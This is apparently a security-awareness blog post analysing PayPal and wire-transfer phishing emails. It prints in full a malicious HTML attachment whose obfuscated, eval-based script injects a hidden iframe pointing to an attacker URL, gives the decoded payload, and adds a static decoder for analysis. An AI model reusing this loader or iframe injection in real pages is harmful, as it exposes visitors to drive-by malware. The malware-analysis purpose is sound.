PayPal & Wire Transfer Scam - Email Scam


Scammers are constantly active, trying to fool unsuspecting people and steal their confidential information and money. Thousands of such emails are sent every day by spammers; a good email filter, like the powerful spam filters of Gmail and Yahoo, catches most of them, but spammers keep coming up with new techniques to bypass these filters. These days private email exchange servers (private company mail servers) are a favourite target of these spammers.





You might have heard about spamming on social media channels (Facebook spam, LinkedIn spam, and so on); the dangerous case is the spam email that is able to steal the victim's financial information. Look at the scam below.


I have just received a PayPal spam email. We can easily tell that this is not a legitimate email because it starts with "Dear Pay Pal user", whereas PayPal always addresses the customer by name. You can see that the spammers have simply put hyperlinks on some of the text; the links are not PayPal links but the spammer's own website. The target site might host malware or a PayPal phishing page, or it may simply redirect you to another website.


The second email from the spammer is a wire transfer email; look at the picture:





The spammers attached an HTML file and claimed it is an "Internet Explorer file", meaning they want the recipient to open it in Internet Explorer; since IE is more vulnerable than other browsers, the chance of success is higher.


Let's analyze it:



This is the HTML file and the code it contains:



<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
</head>
<body>
<style>
body { margin: 0;}
#iframe_box {position: absolute; overflow: auto; margin: 0; width: 100%; height: 100%;}
</style>
<script>
c=3-1;i=-2+c;
if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){
if(window.document)f=['-30i78i57i74i-8i58i71i80i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i-8i-30i58i71i80i6i65i60i-8i21i-8i-1i65i62i74i57i69i61i55i58i71i80i-1i19i-8i-30i58i71i80i6i75i74i59i-8i21i-8i-1i64i76i76i72i18i7i7i79i65i75i67i71i70i75i65i70i76i72i57i74i57i6i74i77i18i16i8i16i8i7i65i69i63i7i23i72i74i71i69i71i21i70i57i59i64i57i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i75i76i81i68i61i6i71i78i61i74i62i68i71i79i-8i21i-8i-1i64i65i60i60i61i70i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i57i72i72i61i70i60i27i64i65i68i60i0i58i71i80i1i19'][0].split('i');
v="ev"+"a"+"l";
}
if(v)e=window[v];
w=f;s=[];r=String;
for(;204!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);}
if(v)z=s;
e(z);
</script>
</body>
</html>


This is obfuscated JavaScript, and I have decoded it (jsunpack output):



//eval
var box = document.createElement('iframe');
box.id = 'iframe_box';
box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha';
document.body.style.overflow = 'hidden';
document.body.appendChild(box);
//jsunpack.called CreateElement iframe
//jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha
//jsunpack.url var s = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box);
//jsunpack.url var z = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box);
//jsunpack.url var newurl = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box);
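The decoding above can be reproduced without ever handing the script to eval or a browser. The example below is added here and is not code from the original post or from jsunpack: it copies the number array from the attachment, applies the same rule the visible loop uses (split on 'i', add 40, String.fromCharCode), and then inspects the resulting text statically for iframe creation, hidden overflow and embedded URLs. It also shows the gate the script relies on: the payload only runs when parseInt("0123") === 83, which is true only in older engines that still treated a leading zero as octal (ES3-era behaviour, removed in ES5), so the same attachment is inert in a modern engine and in any sandbox that does not emulate the old one. Function names and the regexes are this example's own choices.

```javascript
// Static decoder for the number-array / fromCharCode obfuscation used in the
// attachment. Added example, not the page's or jsunpack's code. The encoded
// array is copied verbatim from the attachment shown above.
const ENCODED =
  '-30i78i57i74i-8i58i71i80i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i-8i-30i58i71i80i6i65i60i-8i21i-8i-1i65i62i74i57i69i61i55i58i71i80i-1i19i-8i-30i58i71i80i6i75i74i59i-8i21i-8i-1i64i76i76i72i18i7i7i79i65i75i67i71i70i75i65i70i76i72i57i74i57i6i74i77i18i16i8i16i8i7i65i69i63i7i23i72i74i71i69i71i21i70i57i59i64i57i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i75i76i81i68i61i6i71i78i61i74i62i68i71i79i-8i21i-8i-1i64i65i60i60i61i70i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i57i72i72i61i70i60i27i64i65i68i60i0i58i71i80i1i19';

// Decode: every token is an integer; the script adds 40 and maps it through
// String.fromCharCode. We do the same arithmetic and return plain text.
function decodeOffsetArray(encoded, separator = 'i', offset = 40) {
  return encoded
    .split(separator)
    .map((tok) => String.fromCharCode(Number(tok) + offset))
    .join('');
}

// The script's guard: parseInt("0123") === 83 only where a leading zero is
// read as octal (ES3-era engines). Modern engines return 123. An engine's
// parseInt can be passed in so the legacy behaviour can be simulated.
function legacyOctalGateOpen(engineParseInt = parseInt) {
  return engineParseInt('0' + '1' + '2' + '3') === 83;
}

// Pull URLs out of the decoded text without executing anything.
function extractUrls(decoded) {
  return decoded.match(/https?:\/\/[^\s'"]+/g) || [];
}

// Triage summary: what the payload would do if the gate were open.
function analyse(encoded) {
  const decoded = decodeOffsetArray(encoded);
  return {
    decoded,
    createsIframe: /createElement\(['"]iframe['"]\)/.test(decoded),
    hidesOverflow: /overflow\s*=\s*['"]hidden['"]/.test(decoded),
    urls: extractUrls(decoded),
  };
}

const report = analyse(ENCODED);
console.log(report.decoded);
console.log('URLs:', report.urls);
console.log('legacy octal gate open in this engine:', legacyOctalGateOpen());
```

Running this under Node prints the five decoded statements, the single URL, and `false` for the gate, which is why a dynamic sandbox built on a current engine would report the file as doing nothing; the static decode is what exposes the iframe and its destination.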



It is a form of iframe injection attack: the script creates a hidden, full-page iframe, and its final destination URL is



//jsunpack.called CreateElement iframe //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha


It is not a bank website but the URL of a malicious website.


So the conclusion is very simple: never trust a suspicious email, because such emails are nothing but a way to steal your money. Educate the people around you, because security awareness is the only real foundation of online security.
Source: http://www.ehacking.net/2012/04/paypal-wire-transfer-scam-email-scam.html